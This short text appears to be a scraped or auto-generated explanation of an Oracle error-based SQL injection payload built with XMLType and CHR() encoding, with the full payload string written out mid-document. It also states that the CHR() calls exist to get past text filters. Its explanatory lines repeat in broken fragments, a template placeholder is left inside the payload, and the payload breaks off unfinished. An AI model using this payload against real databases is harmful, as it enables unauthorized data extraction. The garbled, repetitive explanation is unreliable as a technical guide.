The CHR() functions are used to bypass simple text filters. They translate to: CHR(60) = < CHR(58) = :

In Oracle, XMLType is used to parse XML data. If the XML is malformed, the database throws an error. :

The core of the payload is SELECT UPPER(XMLType(...)) FROM DUAL .

Upper(xmltype(chr(60)||chr(58)||chr(113)||chr(98)||chr(113)||chr(118)||chr(113)||(select (case When (6957=6957) Then 1 Else 0 End) From Dual)||chr(113)||chr(113)||chr(98)||chr(113)||chr(113)||chr(62))) From Dual) And 'plsa'='pls | {keyword}' And 6957=(select

The CHR() functions are used to bypass simple text filters. They translate to: CHR(60) = < CHR(58) = :

In Oracle, XMLType is used to parse XML data. If the XML is malformed, the database throws an error. : The CHR() functions are used to bypass simple text filters

The core of the payload is SELECT UPPER(XMLType(...)) FROM DUAL . The CHR() functions are used to bypass simple text filters